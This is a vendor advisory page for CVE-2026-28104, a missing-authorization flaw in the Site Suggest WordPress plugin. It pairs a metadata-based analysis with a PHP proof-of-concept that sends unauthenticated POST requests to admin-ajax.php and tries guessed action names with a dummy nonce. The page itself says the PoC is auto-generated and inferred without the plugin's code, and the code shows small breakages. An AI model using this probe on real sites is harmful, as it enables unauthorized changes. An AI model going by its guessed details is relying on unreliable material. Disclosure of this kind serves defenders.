Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-28104: Site Suggest <= 1.3.9 – Missing Authorization (site-suggest)

Plugin site-suggest
Severity Medium (CVSS 5.3)
CWE 862
Vulnerable Version 1.3.9
Patched Version
Disclosed February 25, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-28104 (metadata-based):
The vulnerability is a Missing Authorization (CWE-862) flaw in the Site Suggest WordPress plugin versions up to 1.3.9. The description confirms the absence of a capability check on a function, allowing unauthenticated attackers to perform unauthorized actions. The CVSS vector (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) indicates network accessibility, low attack complexity, no privileges required, no user interaction, and low integrity impact with no confidentiality or availability effects. Atomic Edge research infers the vulnerability likely exists in a WordPress AJAX handler or REST API endpoint registered by the plugin. A common pattern for such plugins involves frontend submission forms that trigger backend functions. The missing authorization check permits unauthenticated users to invoke these functions directly. The specific unauthorized action cannot be confirmed without code, but typical impacts for similar plugins include unauthorized data submission, settings modification, or content injection. The fix requires adding a proper capability check, likely using current_user_can() for AJAX handlers or permission_callback for REST endpoints. Exploitation would involve sending crafted HTTP requests to the plugin’s exposed endpoint.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-28104 - Site Suggest <= 1.3.9 - Missing Authorization
<?php
/**
 * Proof of Concept for CVE-2026-28104.
 * Assumptions based on WordPress plugin patterns:
 * 1. The plugin registers an AJAX action hook without a capability check.
 * 2. The action name likely contains 'site_suggest' or a derivative.
 * 3. The endpoint is /wp-admin/admin-ajax.php.
 * 4. The vulnerable function accepts POST parameters.
 * This PoC attempts common AJAX action names.
 */

$target_url = 'https://example.com/wp-admin/admin-ajax.php';

// Common AJAX action patterns for the 'site-suggest' plugin
$possible_actions = [
    'site_suggest_submit',
    'site_suggest_save',
    'site_suggest_action',
    'sitesuggest_process',
    'ss_ajax_handler'
];

foreach ($possible_actions as $action) {
    $ch = curl_init();
    $post_data = [
        'action' => $action,
        'data' => 'AtomicEdge_test_payload', // Generic test parameter
        'nonce' => 'bypassed' // Nonce may be absent or not validated
    ];
    
    curl_setopt_array($ch, [
        CURLOPT_URL => $target_url,
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => $post_data,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_TIMEOUT => 10
    ]);
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    if ($http_code == 200 && !empty($response)) {
        echo "Potential vulnerable action found: $actionn";
        echo "Response: $responsen";
        break;
    }
}
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School